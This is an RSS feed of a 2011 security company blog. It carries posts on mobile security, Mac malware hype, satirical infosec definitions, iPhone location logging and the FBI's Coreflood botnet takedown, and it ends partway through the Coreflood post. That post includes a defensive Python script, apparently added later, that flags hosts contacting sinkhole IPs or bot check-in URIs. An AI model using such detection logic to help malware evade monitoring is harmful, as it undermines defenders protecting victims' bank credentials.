<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Information Security Blog &#124; Perimeter E-Security</title>
	<atom:link href="http://perimeterusa.com/blog/feed/" rel="self" type="application/rss+xml" />
	<link>http://perimeterusa.com/blog</link>
	<description>News, Notes, and Opinions from the World of Information, Network, and Data Security</description>
	<lastBuildDate>Tue, 28 Jun 2011 13:44:08 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.4</generator>
		<item>
		<title>CTO&#8217;s Reading List: Four Articles You Should Read Today</title>
		<link>http://perimeterusa.com/blog/ctos-reading-list-four-articles-you-should-read/</link>
		<comments>http://perimeterusa.com/blog/ctos-reading-list-four-articles-you-should-read/#comments</comments>
		<pubDate>Tue, 28 Jun 2011 13:42:24 +0000</pubDate>
		<dc:creator>ajaquith</dc:creator>
				<category><![CDATA[Blog Post]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1255</guid>
		<description><![CDATA[Four articles you should read today: "The Current State of Mobile Device Security," "Take a bow everybody, the security industry really failed this time," "It's Getting Awfully Lonely in PC Land," and my own "Three Lessons from the RSA Hack, from a Customer's Perspective."]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s time to post up a few quick articles that got my attention yesterday and this morning.</p>
<p><strong>The Current State of Mobile Device Security</strong></p>
<p>Symantec&#8217;s Carey Nachemburg (hi, Carey!) posted a <a href="http://www.symantec.com/connect/blogs/new-symantec-research-current-state-mobile-device-security">short write-up</a> on their analysis of the Apple iOS and Google Android mobile operating systems from a security point of view. Carey calls Apple iOS &#8220;not perfect&#8230; [but] well designed and has thus far proven largely resistant to most types of attacks.&#8221; That&#8217;s <a href="http://www.forrester.com/rb/Research/apples_iphone_and_ipad_secure_enough_for/q/id/57240/t/2">essentially the conclusion I came to a year ago</a> while I was a Forrester analyst (I was the first analyst to pronounce the iPhone and iPad &#8220;safe for business&#8221;). The <a href="http://www.symantec.com/content/en/us/about/media/pdfs/symc_mobile_device_security_june2011.pdf?om_ext_cid=biz_socmed_twitter_facebook_marketwire_linkedin_2011Jun_worldwide_mobilesecuritywp">full report is here</a>. It is a bit superficial and contains a few glaring errors related to encryption, but is mostly well-done. I recommend you read it. In the case of iOS, it&#8217;s nice to see Symantec acknowledging that Apple mostly got the security model right after years of fearmongering. In the case of Android, Carey&#8217;s conclusions also mirror my own: the delegation of security choices to the consumer isn&#8217;t good for security, nor is what he calls the &#8220;provenance model.&#8221; (In plain English, this means that consumers can install apps from just about anywhere, including dubious sources; this is the opposite of Apple&#8217;s curated App Store model.)</p>
<p>I have two minor caveats about the paper: first, consider the source. Most of the issues in the paper discuss security topics through the lens of malware and data loss. That&#8217;s appropriate, given what Symantec sells: anti-virus, DLP and network security products, but the mobile&#8217;s defining security issue &#8212; privacy! &#8212; receives very little treatment at all, and its omission is surprising. Second, there are better and more substantive technical analyses of Android and iOS out there. For Android, check out Jesse Burns&#8217; <a href="http://www.blackhat.com/presentations/bh-usa-09/BURNS/BHUSA09-Burns-AndroidSurgery-PAPER.pdf">2009 Black Hat presentation</a> and his <a href="https://www.hashdays.ch/assets/files/slides/burns_android_security_the%20fun%20details.pdf">follow-up presentation</a> at Hashdays 2010. For iOS, Dino Dai Zovi&#8217;s 2011 Black Hat presentation (&#8220;<a href="http://blackhat.com/html/bh-us-11/bh-us-11-briefings.html">Apple iOS Security Evaluation</a>&#8220;) looks like it will be terrific (I&#8217;ve spoken to him about it). So if you plan to be at Black Hat in August, do not miss this one.</p>
<p><strong>Take a bow everybody, the security industry really failed this time</strong></p>
<p>Errata Security&#8217;s David Maynor, who has been relatively quiet for quite a while, <a href="http://erratasec.blogspot.com/2011/06/take-bow-everybody-security-industry.html">posts a beauty</a>. He absolutely nails the key point of the <a href="http://techcrunch.com/2011/06/25/after-50-days-of-attacks-hacker-group-lulzsec-says-its-done/">LulzSec</a> and <a href="http://news.cnet.com/8301-27080_3-20072675-245/lulzsec-anonymous-announce-hacking-campaign/">Anonymous</a> hacking chaos: &#8220;I&#8217;ve heard a lot of people say that Lulzsec did security a favor by really showing the need for security. I disagree completely. I think Lulzsec has shown how ineffective the security community and marketplace really is. These were not mom and pop targets that got hit but instead were several mega corporations that spend more money on security than most people will make in a lifetime. The spending did not stop the compromise and posting of their sensitive data so what good is it?&#8221;</p>
<p>Dave&#8217;s point is worth noting: both LulzSec and Anonymous introduce elements of chaos and activism into the information security landscape. Both of these groups demonstrate that gear and tools alone won&#8217;t help companies defend themselves against determined adversaries who want to compromise them. As the discussion about the Advanced Persistent Chinese Threat has shown, there&#8217;s a world of difference between being a target of <em>choice</em> and a target of <em>chance</em>. Human firewalls (monitoring, diligence, vigilance) matter. Worth a read.</p>
<p><strong>It&#8217;s Getting Awfully Lonely in PC Land</strong></p>
<p><a href="http://online.barrons.com/article/SB50001424053111904548404576397750637222820.html">A Barron&#8217;s article</a> shines a spotlight on the elephant in the room: with all of the energy and profits in the computing industry moving to Post-PC devices (smartphones and tablets), is being a commodity PC maker worth it any more? From the article: &#8220;It&#8217;s a theme you hear again and again: That terrible PC market? We&#8217;ve got nothing to do with that&#8230; so unloved is the business that Sanford Bernstein analyst Toni Sacconaghi offered a think piece last week in which he pondered whether HP and Dell could dump their PC businesses. Sacconaghi doesn&#8217;t think they can or should, and he doesn&#8217;t think they will, but a lot of that has to do with both being rather stuck in those markets with no practical exit strategy.&#8221; If you attended my webinar on <a href="http://www.perimeterusa.com/knowledge-center/webinars/on-demand">Best Practices for Mobile Security</a>, you&#8217;ll recall some market growth figures I cited, from industry analyst Gartner. In particular: by 2015, nearly three-quarters of the internet-capable devices will be Post-PC devices, not traditional PCs. This will change the way we work. And it is changing how we think about security.</p>
<p><strong>Three Lessons from the RSA Hack, from a Customer&#8217;s Perspective</strong></p>
<p>Last but not least, <a href="http://www.securityweek.com/three-lessons-rsa-hack-customers-perspective">my latest column for SecurityWeek</a> went live last week. In this article, I describe Perimeter&#8217;s view of the RSA SecurID token hack. The first shoe dropped in March, when the company disclosed via press release that an unknown attacker, likely a state-sponsored actor, stole certain unidentified assets related to its SecurID product. The other shoe dropped last month when Lockheed Martin revealed that attackers had tried to break into the defense contractor using the materials they stole in March. That made the risks that RSA had characterized as &#8220;hypothetical&#8221; much more real. I observed three things about this incident: (1) even the most trusted technologies fail; (2) the incident illustrates what &#8220;risk management&#8221; is all about; and (3) customers should always come first. If I had to grade RSA&#8217;s responses, both to the initial hack and to the more recent revelations, I could not give them better than a D. Read this article if you want to see our take on the issue.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/ctos-reading-list-four-articles-you-should-read/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Don&#8217;t Panic Over the Latest Mac Malware Story</title>
		<link>http://perimeterusa.com/blog/dont-panic-over-the-latest-mac-malware-story/</link>
		<comments>http://perimeterusa.com/blog/dont-panic-over-the-latest-mac-malware-story/#comments</comments>
		<pubDate>Fri, 20 May 2011 13:31:35 +0000</pubDate>
		<dc:creator>ajaquith</dc:creator>
				<category><![CDATA[Blog Post]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1251</guid>
		<description><![CDATA[Yesterday, SecurityWeek published my article "Don't Panic Over the Latest Mac Malware Story." I ask and answer four questions: Who benefits from the story? Why should we care? If we do care, what do we do about it? What else should we be thinking about? You can read the column in full at the SecurityWeek website.]]></description>
			<content:encoded><![CDATA[<p>Yesterday, SecurityWeek published my most recent monthly column, titled &#8220;<a href="http://www.securityweek.com/dont-panic-over-latest-mac-malware-story">Don&#8217;t Panic Over the Latest Mac Malware Story</a>.&#8221; I wrote it to shed some light on the Serious Mac Malware Is Here! stories that have been flooding The Interwebs. Here&#8217;s an excerpt:</p>
<p style="padding-left: 30px">Longtime Microsoft columnist Ed Bott made national news on May 2nd, when he asserted categorically that “serious malware is coming soon to a Mac near you.” As evidence, Ed pointed to a video made by a Danish IT security company named the CSIS eCrime Unit, a company I have never heard of. That video describes a “crimeware” program that can build Mac-compatible Trojan-horse programs for capturing keystrokes and passwords. To lure customers into installing the Trojan, customers that visit poisoned websites are shown native-looking dialogs that try to scare them into downloading fake security software. Ed has since followed up his initial column with four more posts on the same subject. The most recent one describes a large increase in customers who are complaining about malware in Apple support forums. All of these posts are meant to persuade readers that, indeed, the Mac is becoming just like Windows: malware-laden and dangerous&#8230; I ask four questions:</p>
<ul style="padding-left: 30px">
<li>Who benefits from the story?</li>
<li>Why should we care?</li>
<li>If we do care, what do we do about it?</li>
<li>What else should we be thinking about?</li>
</ul>
<p>You can read the column in full <a href="http://www.securityweek.com/dont-panic-over-latest-mac-malware-story">at the SecurityWeek website</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/dont-panic-over-the-latest-mac-malware-story/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Second Annual Devil&#8217;s Dictionary, InfoSec Edition</title>
		<link>http://perimeterusa.com/blog/the-second-annual-devils-dictionary-infosec-edition/</link>
		<comments>http://perimeterusa.com/blog/the-second-annual-devils-dictionary-infosec-edition/#comments</comments>
		<pubDate>Mon, 02 May 2011 22:38:22 +0000</pubDate>
		<dc:creator>ajaquith</dc:creator>
				<category><![CDATA[Blog Post]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1239</guid>
		<description><![CDATA[Just over a year ago, I wrote the first annual Devil&#8217;s Dictionary, InfoSec Edition. It was a nod to noted journalist and satirist Ambrose Bierce, who wrote the original Devil&#8217;s Dictionary. Information security being the clubby, jargon-filled industry that it is, I found it hard to resist writing some alternative definitions to the pet phrases [...]]]></description>
			<content:encoded><![CDATA[<p>Just over a year ago, I wrote the first annual <a href="http://blogs.forrester.com/security_and_risk/2010/01/the-devils-dictionary-infosec-edition.html">Devil&#8217;s Dictionary, InfoSec Edition</a>. It was a nod to noted journalist and satirist Ambrose Bierce, who wrote the original Devil&#8217;s Dictionary. Information security being the clubby, jargon-filled industry that it is, I found it hard to resist writing some alternative definitions to the pet phrases I hear in the hallways, at conferences and in the press.</p>
<p>Here, then, is the second annual dictionary.</p>
<p><strong>Data loss prevention</strong>, <em>noun.</em> Having enough backup capacity and fault tolerance to withstand a significant outage without destroying storage media. E.g., &#8220;I sure wish Amazon had a data loss prevention strategy. It would&#8217;ve saved my bacon when EC2 went down.&#8221;</p>
<p><strong>Exfiltrate</strong>, <em>noun.</em> Used coffee grounds. E.g., &#8220;I went to throw out my kitchen trash, but it stank because it was full of exfiltrate.&#8221;</p>
<p><strong>Remote wipe</strong>, <em>phrase.</em> A radio-controlled windshield squeegee.</p>
<p><strong>Compliant</strong>, <em>adjective</em>. A feeling of zen-like calm that pervades an organization immediately before a data security breach. Related: see also <em>PCI-DSS</em>. E.g., B. Russo: &#8220;No organization compliant with PCI-DSS has ever been breached.&#8221;</p>
<p><strong>Location-based services</strong>, <em>phrase</em>.</p>
<p><strong>Phishing</strong>, <em>noun</em>. The practice of trolling for online victims by sending emails containing lurid headlines, fake correspondence from acquaintances or false pretenses to lure prospects to malicious websites.*</p>
<p><strong>Mobile security</strong>, <em>phrase</em>. (1) A Taser. (2) An illusory market opportunity.</p>
<p><strong>Spear phishing</strong>, <em>phrase</em>. See <em>phishing</em>. Considered superfluous.</p>
<p><strong>Privacy policy</strong>, <em>phrase</em>. The practice of promiscuously disseminating personal information about consumers; generally halted when television cameras are on and customers catch on.</p>
<p><strong>Whaling</strong>, <em>noun</em>. See <em>phishing</em>. Considered superfluous and causes spontaneous giggles in listeners when uttered.</p>
<p><strong>Advanced persistent threat</strong>, <em>phrase</em>. An obscure medical condition, similar to plantar warts, that can only be cured by regular and vigorous application of miracle tonic.</p>
<p><strong>Vishing</strong>, <em>noun</em>. See <em>phishing</em>. Considered superfluous and causes speakers to be defenestrated when uttered.</p>
<p><strong>Cloud Security Alliance</strong>, <em>proper noun</em>. A dinnertime speakers society, similar to Toastmasters.</p>
<p><strong>Encryption</strong>, <em>noun</em>. An auditor-prescribed nasal spray that eases lung congestion when inhaled by the afflicted. Popular brands prescribed include 2BIT, SHA and XOR.</p>
<p>* This is, more or less, the real definition.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/the-second-annual-devils-dictionary-infosec-edition/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What Can We Learn from the Apple Location-Services Privacy Flap?</title>
		<link>http://perimeterusa.com/blog/what-can-we-learn-from-the-apple-location-services-privacy-flap/</link>
		<comments>http://perimeterusa.com/blog/what-can-we-learn-from-the-apple-location-services-privacy-flap/#comments</comments>
		<pubDate>Mon, 25 Apr 2011 15:42:11 +0000</pubDate>
		<dc:creator>ajaquith</dc:creator>
				<category><![CDATA[Blog Post]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1231</guid>
		<description><![CDATA[Last week, a tempest in a teapot erupted over the revelation that Apple&#8217;s iPhone has been keeping records of where customers&#8217; phones have been over extended periods of time. This revelation came at the O&#8217;Reilly Where 2.0 conference, where researchers Alasdair Allan and Pete Warden unveiled iPhoneTracker, a tool that reads and analyzes the location [...]]]></description>
			<content:encoded><![CDATA[<p>Last week, a tempest in a teapot erupted over the revelation that Apple&#8217;s iPhone has been keeping records of where customers&#8217; phones have been over extended periods of time. This revelation came at the O&#8217;Reilly Where 2.0 conference, where researchers <a href="http://petewarden.github.com/iPhoneTracker/">Alasdair Allan and Pete Warden unveiled iPhoneTracker</a>, a tool that reads and analyzes the location records that are (surprise!) present in iPhone backup files. These location records log coarse-grained Wi-Fi and cell-tower triangulation data. Allan and Warden&#8217;s tool mashes up the geolocation data and presents it on a map, showing graphically where you&#8217;ve been and how often. Neat! But a bit creepy.</p>
<p>Plenty of commentators commented as you would expect. Sophos&#8217; Graham Cluley was <a href="http://www.computerworld.com/s/article/9215984/iPhone_secretly_tracks_user_location_say_researchers?taxonomyId=84&amp;pageNumber=2">uncharacteristically restrained</a>, suggesting that &#8220;most users would not expect their iPhones to be doing this and they&#8217;d have a right to be upset. [But] I think things tend not to be conspiracies, but are more often cock-ups, accidents that happen.&#8221; My former colleague Chenxi Wang at Forrester Research was harsher, and swiftly pronounced the incident a <a href="https://twitter.com/#!/chenxiwang/status/60816536834809856">&#8220;breach of trust.&#8221;</a> She also got in the &#8220;bookend&#8221; quote in the New York Times in <a href="http://www.nytimes.com/2011/04/21/business/21data.html">a story about the subject</a>, saying that &#8220;It doesn&#8217;t matter how Apple explains its way out of this, just the fact that consumers know that their phone is being tracked is a very big deal.&#8221;</p>
<p>Noted wily-hacker repeller Steve Bellovin got the <em>early</em> story about right, <a href="https://www.cs.columbia.edu/~smb/blog/2011-04/2011-04-20.html">noting that the location information the iPhone keeps is limited</a> to coarse-grained data. He states correctly that &#8220;log files are useful operationally, but also represent a privacy threat if misused&#8221; and then asks the key question: &#8220;is this data ever sent to Apple? &#8230; If it should turn out that Apple is receiving the data, the privacy threat becomes very great. It is also highly likely that Apple will suffer a major PR problem and probably legal consequences as well.&#8221;</p>
<p>After the early stories ran, we learned that the location data Apple has been collecting have been present on iPhones for a long, long time: in its current format since at least June 2010, and in other forms since before that. Alex Levinson <a href="http://alexlevinson.wordpress.com/2011/04/21/3-major-issues-with-the-latest-iphone-tracking-discovery/">wrote on his blog</a> that &#8220;this hidden [location] file is neither new nor secret,&#8221; and showed photographs of pages from his book <a href="http://www.amazon.com/iOS-Forensic-Analysis-iPhone-Professionals/dp/1430233427">&#8220;iOS Forensics&#8221;</a> (co-authored with Sean Morrissey) that came out in December. He also pointed out that prior to iOS 4, similar location-tracking logs were kept in a different (root-accessible-only) Plist file.</p>
<p>Meanwhile, the Feds have started to ask pointed questions. Last Thursday, US House Representative Ed Markey <a href="http://markey.house.gov/docs/apple_ios_letter_04.21.11.pdf">sent Steve Jobs a letter</a>, asking about the purpose of the location-logging feature, whether the devices actually transmit their location data back to Apple, what Apple does with the data and whether customers have the ability to opt-out. The German Data Protection Authority has stated that the <a href="http://www.nytimes.com/2011/04/22/technology/22data.html?_r=1&amp;scp=2&amp;sq=apple&amp;st=cse">collection of personally identifying information without explicit consent</a> may be illegal under EU law.</p>
<p>As of this morning, additional stories from the Wall Street Journal and other publications fill in a few more missing details:</p>
<ul>
<li>We learned that mobile forensics firms like Levinson&#8217;s have <a href="http://news.cnet.com/8301-31921_3-20056344-281.html">known about the iPhone&#8217;s location data-logging capability for a while</a></li>
<li>We learned that iPhones do, in fact, transmit at least <a href="http://www.nytimes.com/2011/04/22/technology/22data.html?_r=2&amp;scp=2&amp;sq=apple&amp;st=cse">some of the location data they collect back to Apple</a>, apparently anonymously</li>
<li>We learned that <a href="http://online.wsj.com/article/SB10001424052748703983704576277101723453610.html">Google&#8217;s Android operating system has been collecting similar information</a>, and that both Google and Apple are using the data they collect to make their location-based services, such as mapping, more effective</li>
</ul>
<p>This is a fast-moving story, and more facts will doubtlessly emerge over the next few days and weeks. What&#8217;s been striking about this story is how explosive it has been: how quickly it flooded the news outlets, and how quickly the Federales have gotten involved. It&#8217;s equally striking how explosive the story has been <em>compared to other security and privacy stories</em>. To put this in perspective: as a society, we have tolerated nearly twenty years of PC insecurity, with dire consequences for all involved and in the face of the diminishing effectiveness of available countermeasures. As we all know, millions of customers&#8217; computers are 0wned by botnet operators who scour hard drives for credit card numbers or install keyloggers to capture bank credentials. Billions of dollars have been spent on anti-virus software to counteract what economists would probably call an <a href="http://en.wikipedia.org/wiki/Externality">externality</a>. Worst of all, plenty of evidence abounds that AV protections are failing. And yet there has been zero action in Congress on software liability laws that might cause software makers to bear any of the burden of insecure products. Of course, we&#8217;re happy to pass the cost on to the banks via the Red Flags Rule. Because everybody knows banks are soft targets with plenty of money, right?</p>
<p>But by contrast, here we have a story about a handset maker (Apple) that is collecting diagnostic information about where the devices it makes are being used. This handset maker is probably collecting the data for fairly benign reasons, but might be doing it for nefarious ones too. We don&#8217;t know yet. But because the information has the potential to be a <em>tracking</em> service, people are pissed off, creeped out, and calling for Congressional action. What this tells me is that location-tracking &#8212; the fear of Little Brother aka Steve Jobs &#8212; resonates with the public in ways that other security issues do not.</p>
<p>Location-tracking even seems to trump the privacy issues that we already know are pervasive with related internet technologies: notably, e-mail web bugs, cookies, search engines, Facebook and e-mail indexers. And yet no security and privacy stories have struck the nerve this one has. Computer owned? Yeah that sucks, but whatever, I&#8217;ll keep buying Windows. Eerily uncanny ads in your Gmail? A little creepy, but the e-mail is &#8220;free&#8221; so I don&#8217;t mind. Phone tracked? CALL YOUR CONGRESSMAN!</p>
<p>This particular iPhone story is just the tip of the mobile privacy iceberg. Beyond location tracking, we know that many mobile application makers, <a href="http://www.veracode.com/blog/2011/04/mobile-apps-invading-your-privacy/">like Pandora, are transmitting location data</a>, gender and listening habits to advertisers (tip of the hat to my friends at Verac0de). Earlier studies from firms such as Lookout have shown that chatty mobile apps tend to generally overshare your personal information.</p>
<p>What to make of all this? I choose to take the optimistic view. Here&#8217;s why:</p>
<ul>
<li><strong>Privacy, not security, will be the dominant issue with mobile devices.</strong> I&#8217;ve made this point many times before, more recently during last week&#8217;s webinar on mobile security best practices. I highly recommend you <a href="http://www.perimeterusa.com/knowledge-center/webinars/on-demand#200">watch the webinar</a>, and not just because the presenter is a devilishly handsome, silver-tongued know-it-all.</li>
<li><strong>Sunlight is the best disinfectant</strong>. Revelations about the collection of sensitive location and personal information are going to increase calls for Congressional action, which frankly I feel is a positive development. The sooner this stuff gets out in the open, the better.</li>
<li><strong>The US will get better data privacy laws</strong>. The US is likely to regulate more tightly the collection of personal information about customers by firms. Already, <a href="http://www.huntonprivacyblog.com/2011/04/articles/centre-for-information-policy-2/senators-kerry-and-mccain-introduce-the-commercial-privacy-bill-of-rights-act-of-2011/">Senators John Kerry and McCain have introduced legislation that will move the US closer to the EU</a> in terms of how consumer consent is collected, and in terms of the amount of control consumers have over the information entrusted to the firms they do business with. Remember, you heard it here first &#8212; I predicted this in December of last year. A cynical note: expect a generous carve-out for existing Little Brother financial data aggregators like Experian and Fair Isaac.</li>
<li><strong>The dividing line between telemetry and Your Stuff will be clearer</strong>. Apple has previously claimed that the <a href="http://www.wired.com/images_blogs/gadgetlab/2011/04/applemarkeybarton7-12-10.pdf">location data it receives from its devices are anonymized</a> and aren&#8217;t tied to particular devices (and thus, cannot be re-associated with particular customers). If so, you&#8217;d probably properly call the information Apple receives <em>telemetry</em>. The regulation that may be coming will help clarify what the rules for using telemetry data will be, and should help delineate what types of information are really for diagnostic purposes, and what qualifies as personal information &#8212; that is to say, what is Your Stuff.</li>
<li><strong>Corporations will be under more pressure to be good custodians</strong> of the data they collect. Those of you who have followed my research as an analyst know that I divide sensitive data into two types: &#8220;toxic data&#8221; about customers, such as the personally identifying variety, and &#8220;secrets&#8221; such as copyrights, patents, various intellectual property and other strategic information. Location data falls into the &#8220;toxic data&#8221; category, and as such, corporations who keep such data have a responsibility to safeguard the data they keep on behalf of their customers. If we see privacy legislation such as McCain-Kerry take wind in Congress, custodianship of customer data will quickly become a CEO-level issue.</li>
</ul>
<p>So, that&#8217;s my take. As always, I welcome your comments, pesky questions, kind words, tweets, and trackbacks.</p>
]]></content:encoded>
			<wfw:commentRss>http://perimeterusa.com/blog/what-can-we-learn-from-the-apple-location-services-privacy-flap/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>FBI Takes Down Coreflood Botnet, But Many Companies Remain Vulnerable</title>
		<link>http://perimeterusa.com/blog/fbi-takes-down-coreflood-botnet-but-many-companies-remain-vulnerable/</link>
		<comments>http://perimeterusa.com/blog/fbi-takes-down-coreflood-botnet-but-many-companies-remain-vulnerable/#comments</comments>
		<pubDate>Fri, 15 Apr 2011 21:27:05 +0000</pubDate>
		<dc:creator>ajaquith</dc:creator>
				<category><![CDATA[Blog Post]]></category>
		<category><![CDATA[application penetration testing]]></category>
		<category><![CDATA[Application Vulnerability]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Data Breach]]></category>
		<category><![CDATA[Hackers]]></category>
		<category><![CDATA[Identity Theft]]></category>
		<category><![CDATA[IT Security]]></category>
		<category><![CDATA[security monitoring]]></category>
		<category><![CDATA[security penetration testing]]></category>
		<category><![CDATA[Vulnerability Assessment Tools]]></category>
		<category><![CDATA[Web Content Filtering]]></category>

		<guid isPermaLink="false">http://perimeterusa.com/blog/?p=1218</guid>
		<description><![CDATA[By Harald Wilke, Security Analyst, Perimeter E-Security with Richard S. Westmoreland, Lead Security Analyst and Andrew Jaquith, Chief Technology Officer On Wednesday April 6th the Federal Bureau of Investigation (FBI) seized control of 5 servers used to control as many as 2 million computers infected with Coreflood malware. This malware, also known as AFCore, quietly steals [...]]]></description>
			<content:encoded><![CDATA[<p><em>By Harald Wilke, Security Analyst, Perimeter E-Security<br />
with Richard S. Westmoreland, Lead Security Analyst and Andrew Jaquith, Chief Technology Officer</em></p>
<p>On Wednesday, April 6th, the Federal Bureau of Investigation (FBI) seized control of 5 servers used to control as many as 2 million computers infected with Coreflood malware. This malware, also known as AFCore, quietly steals personal and financial information from the computer and forwards the information to the criminal ring leaders. The attackers use the information collected by AFCore to conduct fraudulent wire transfers, emptying the users&#8217; bank accounts. The botnet is suspected to have existed since at least 2002, and has evolved over the years from IRC-based command and control and selling DDoS/anonymity services to HTTP-based command and control and performing fraud.</p>
<p>Using an approach similar to the one used to take down the Bredolab botnet, US federal investigators were granted special authorization by the Department of Justice to substitute their own command and control server for the hosts operated by the criminal organization. When the bot on an infected machine checks into the new C&amp;C, it is simply given a command to shut down. The DNS records used by the bots have also been pointed to Shadowserver&#8217;s sinkholes.</p>
<p>Law enforcement&#8217;s seizure of the C&amp;C servers now prevents the criminals from accessing any information already harvested by the infected computers. It also keeps them from covering their tracks by deleting files and terminating processes. However, the millions of Coreflood infections remain intact and still require intervention by a trained security analyst or an antivirus program with signatures that detect it. Investigators are also alerting the Internet Service Providers of the compromised machines and requesting that they inform their customers.</p>
<p>More information about the takedown can be found here:</p>
<ul>
<li><a href="http://www.fbi.gov/news/stories/2011/april/botnet_041411/botnet_041411">Botnet Operation Disabled: FBI Seizes Servers to Stop Cyber Fraud</a></li>
<li><a href="http://garwarner.blogspot.com/2011/04/bold-fbi-move-shutters-coreflood-bot.html">Bold FBI Move Shutters COREFLOOD Bot</a></li>
</ul>
<p>Perimeter&#8217;s Security Operations Center is actively monitoring for outbound activity known to be associated with the Coreflood botnet. In one instance, minutes after adding inspection for the redirected C&amp;C check-in, alerts showed 17 actively compromised hosts on a single customer network. Here&#8217;s a sample screenshot from our SOC&#8217;s Security Information and Event Management (SIEM) system:</p>
<div id="attachment_1219" class="wp-caption alignnone" style="width: 643px"><a href="http://perimeterusa.com/blog/wp-content/uploads/2011/04/image001.png"><img class="size-full wp-image-1219" src="http://perimeterusa.com/blog/wp-content/uploads/2011/04/image001.png" alt="" width="633" height="446" /></a><p class="wp-caption-text">Coreflood Botnet Traffic, from Perimeter SOC</p></div>
<p>Looking at the raw event logs, we can see that the compromised host is attempting direct HTTP connections to a sinkhole IP. The URI confirms the activity to be related to a bot C&amp;C check-in:</p>
<p><a href="http://perimeterusa.com/blog/wp-content/uploads/2011/04/image002.png"><img class="alignnone size-full wp-image-1220" src="http://perimeterusa.com/blog/wp-content/uploads/2011/04/image002.png" alt="" width="650" height="103" /></a></p>
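<p>As an added example (not Perimeter&#8217;s SOC code), the following Python script applies the same logic to a handful of constructed proxy log lines: it flags any client whose HTTP requests go to a sinkhole address or carry a check-in style URI, and keeps the weaker &#8220;browser talking straight to an IP literal&#8221; signal in a separate review bucket. The sinkhole addresses and the check-in URI pattern are placeholders, not the real Coreflood indicators; substitute the ones published with the takedown.</p>

```python
import re
from collections import defaultdict

# Constructed sample of proxy log lines (timestamp, client IP, method, URL, HTTP status).
# Invented for this example; not Perimeter SOC data.
SAMPLE_LOGS = """\
2011-04-14T09:12:01Z 10.20.1.15 GET http://192.0.2.10/cgi-bin/checkin.cgi?id=ab12 200
2011-04-14T09:12:05Z 10.20.1.15 GET http://www.example.com/index.html 200
2011-04-14T09:13:41Z 10.20.1.22 POST http://192.0.2.10/cgi-bin/checkin.cgi?id=cd34 200
2011-04-14T09:14:02Z 10.20.1.31 GET http://198.51.100.7/news/today.html 200
2011-04-14T09:15:09Z 10.20.1.22 GET http://192.0.2.11/cgi-bin/checkin.cgi?id=cd34 200
2011-04-14T09:16:33Z 10.20.1.40 GET http://203.0.113.5/images/logo.png 404
"""

# Hypothetical sinkhole addresses (TEST-NET ranges). In practice the list comes
# from the takedown notice / Shadowserver, not from guesswork.
SINKHOLE_IPS = {"192.0.2.10", "192.0.2.11"}

# Hypothetical check-in URI shape. The real Coreflood URI is deliberately not
# reproduced here; use the pattern your IDS vendor or the advisory publishes.
CHECKIN_URI_RE = re.compile(r"^/cgi-bin/checkin\.cgi\?id=[0-9a-f]+$")

IP_LITERAL_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\d+\.\d+\.\d+\.\d+)\s+(?P<method>[A-Z]+)\s+"
    r"http://(?P<host>[^/\s:]+)(?::\d+)?(?P<path>/\S*)?\s+(?P<status>\d{3})$"
)

STRONG = ("sinkhole-ip", "checkin-uri")


def classify_line(line):
    """Return (client, host, reasons) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    host = m.group("host")
    path = m.group("path") or "/"
    reasons = []
    if host in SINKHOLE_IPS:
        reasons.append("sinkhole-ip")
    if CHECKIN_URI_RE.match(path):
        reasons.append("checkin-uri")
    # Browsers normally go to a hostname; bots often hard-code an IP. On its own
    # that is only a weak indicator (CDNs, internal tools), so it is kept separate.
    if IP_LITERAL_RE.match(host) and not reasons:
        reasons.append("direct-to-ip")
    return m.group("client"), host, reasons


def find_hosts(log_text):
    """Group hits by internal client.

    Returns (confirmed, suspicious): dicts of client -> set of reasons. A client
    with a confirmed hit is removed from the suspicious bucket so it is counted once.
    """
    confirmed, suspicious = defaultdict(set), defaultdict(set)
    for line in log_text.splitlines():
        parsed = classify_line(line)
        if not parsed:
            continue
        client, _host, reasons = parsed
        for r in reasons:
            (confirmed if r in STRONG else suspicious)[client].add(r)
    for client in confirmed:
        suspicious.pop(client, None)
    return dict(confirmed), dict(suspicious)


def count_compromised(log_text):
    """Number of distinct internal hosts with a strong Coreflood indicator."""
    return len(find_hosts(log_text)[0])


if __name__ == "__main__":
    confirmed, suspicious = find_hosts(SAMPLE_LOGS)
    print("compromised hosts:", count_compromised(SAMPLE_LOGS))
    for client, reasons in sorted(confirmed.items()):
        print(f"  {client}: {', '.join(sorted(reasons))}")
    for client, reasons in sorted(suspicious.items()):
        print(f"  (review) {client}: {', '.join(sorted(reasons))}")
```

<p>Counting distinct clients rather than raw hits is what turns a pile of alerts into a &#8220;17 compromised hosts&#8221; figure; keeping the direct-to-IP signal in its own bucket stops CDN and internal-tool traffic from inflating that number.</p>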
<p><strong>Recommendations for Perimeter customers</strong></p>
